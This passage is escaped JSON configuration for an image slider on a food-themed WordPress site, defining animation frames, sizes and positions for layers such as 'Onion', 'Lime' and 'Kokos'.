From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":840,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Onion\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic4.png\",\"imageId\":1076},\"size\":{\"width\":{\"d\":{\"v\":\"467px\",\"e\":true},\"n\":{\"v\":\"387px\",\"e\":true},\"t\":{\"v\":\"351px\",\"e\":true},\"m\":{\"v\":\"236px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"337px\",\"e\":true},\"n\":{\"v\":\"279px\",\"e\":true},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"170px\",\"e\":true}},\"originalWidth\":467,\"originalHeight\":337,\"aspectRatio\":{\"d\":{\"v\":1.3857566765578635},\"n\":{\"v\":1.3857566765578635},\"t\":{\"v\":1.3857566765578635},\"m\":{\"v\":1.3857566765578635}}},\"position\":{\"x\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"-10px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-140px\",\"e\":true},\"n\":{\"v\":\"-90px\",\"e\":true},\"t\":{\"v\":\"-20px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":260},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":\"45deg\",\"rotationY\":\"180deg\",\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":10,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Lime\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic5.png\",\"imageId\":1077},\"size\":{\"width\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"358px\",\"e\":true},\"t\":{\"v\":\"306px\",\"e\":true},\"m\":{\"v\":\"184px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"509px\",\"e\":true},\"n\":{\"v\":\"367px\",\"e\":true},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"188px\",\"e\":true}},\"originalWidth\":497,\"originalHeight\":509,\"aspectRatio\":{\"d\":{\"v\":0.9764243614931237},\"n\":{\"v\":0.9764243614931237},\"t\":{\"v\":0.9764243614931237},\"m\":{\"v\":0.9764243614931237}}},\"position\":{\"x\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-160px\",\"e\":true},\"n\":{\"v\":\"-130px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"9px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":330},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.8\",\"scaleY\":\"0.8\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power4.out\",\"speed\":1500,\"start\":330,\"startRelative\":330},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power4.out\",\"speed\":1500,\"start\":330,\"startRelative\":330},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":270,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Kokos\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic2.png\",\"imageId\":1078},\"size\":{\"width\":{\"d\":{\"v\":\"300px\",\"e\":true},\"n\":{\"v\":\"182px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"138px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"411px\",\"e\":true},\"n\":{\"v\":\"249px\",\"e\":true},\"t\":{\"v\":\"336px\",\"e\":true},\"m\":{\"v\":\"189px\",\"e\":true}},\"originalWidth\":316,\"originalHeight\":432,\"aspectRatio\":{\"d\":{\"v\":0.7314814814814815},\"n\":{\"v\":0.7314814814814815},\"t\":{\"v\":0.7314814814814815},\"m\":{\"v\":0.7314814814814815}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-100px\",\"e\":true},\"t\":{\"v\":\"2px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-70px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"-19px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-260,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Image 6\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic8.png\",\"imageId\":1082},\"size\":{\"width\":{\"d\":{\"v\":\"280px\",\"e\":true},\"n\":{\"v\":\"225px\",\"e\":true},\"t\":{\"v\":\"221px\",\"e\":true},\"m\":{\"v\":\"162px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"585px\",\"e\":true},\"n\":{\"v\":\"471px\",\"e\":true},\"t\":{\"v\":\"462px\",\"e\":true},\"m\":{\"v\":\"338px\",\"e\":true}},\"originalWidth\":280,\"originalHeight\":585,\"aspectRatio\":{\"d\":{\"v\":0.47863247863247865},\"n\":{\"v\":0.47863247863247865},\"t\":{\"v\":0.47863247863247865},\"m\":{\"v\":0.47863247863247865}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 